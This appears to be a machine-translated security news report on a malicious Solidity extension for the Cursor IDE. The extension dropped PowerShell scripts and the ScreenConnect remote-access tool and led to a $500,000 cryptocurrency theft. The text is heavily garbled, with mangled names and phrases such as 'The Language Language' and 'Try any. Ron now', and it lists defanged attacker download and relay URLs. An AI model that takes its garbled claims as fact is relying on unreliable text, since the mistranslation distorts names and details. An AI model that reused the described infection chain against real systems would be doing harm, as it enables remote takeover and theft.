An advanced electronic crime operation succeeded in stealing $ 500,000 of cryptocurrencies from the Russian Blockchain developer through a harmful extension targeting the integrated development environment of the index.
The attack, which occurred in June 2025, is a development related to the development of the supply chain attacks that exploit the popularity of artificially backed development tools.
The accident began when the victim, a developer, was threatened with security that recently installed a new operating system, about the extension of the construction of the group of hardness inside the AI IDE index.
Despite the use of the Internet Detection of malware Services and maintaining strict security practices, the developer installed a harmful package unintentionally denied as a legal development tool.
The fake extension, which was published under the name “The Language Language”, collected 54,000 downloads before discovering and removing it.
What makes this attack in particular is the exploitation of the research classification of research to put the harmful extension over the legitimate alternatives.
.webp)
The attackers have benefited from the VSX -based classification system, which is factors that include frequency of updates and downloading charges and classifications.
By spreading their harmful extension with the date of the last update on June 15, 2025, compared to updating the legal extension on May 30, 2025, the Internet criminals succeeded in successfully manipulating the fourth place in the search results during the first place in the eighth place.
Securelist analysts It was identified Magistical programs after conducting a forensic analysis of the paralyzed victim system.
The investigation revealed that the harmful extension does not contain functions to distinguish the actual sentence, instead as a drop of a multi -stage attack series.
Serial infection
A malware infection mechanism shows an advanced understanding of both social engineering techniques and technical evasion.
%20and%20legitimate%20(green)%20extensions%20(Source%20-%20Securelist).webp)
When installing, the extension.js file, located in %userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.jsAnd the connection started immediately with the command server and controlling angelic[.]su.
Powershell first text has been recovered from https://angelic[.]su/files/1.txt It was examined for the presence of a Screenconnect distance program on the victim’s device.
If Screenconnect is not discovered, harmful programs have downloaded a secondary text from https://angelic[.]su/files/2.txtWhich then recovered the Screenconnect installation device https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi.
This is legal A distance access tool It was configured to communicate with the infrastructure of the attackers in relay.lmfao[.]suAnd providing constant access to the hacked system.
The use of legitimate administrative tools is a common tactic used by advanced threat actors to mix harmful activity with regular system operations.
The infrastructure of the attack reveals a good organization that extends beyond this solo accident.
Researchers have discovered harmful bachelors including “Solsafe” in the NPM warehouse and three additional Optical studio code Extensions: Solaibot, between ETH, and BlankbeesxStnion, all of which use identical infection methodologies and communication with the same infrastructure for control and control.
Investigate the behavior of live malware, follow each step of the attack, and make security decisions faster and more intelligent -> Try any. Ron now
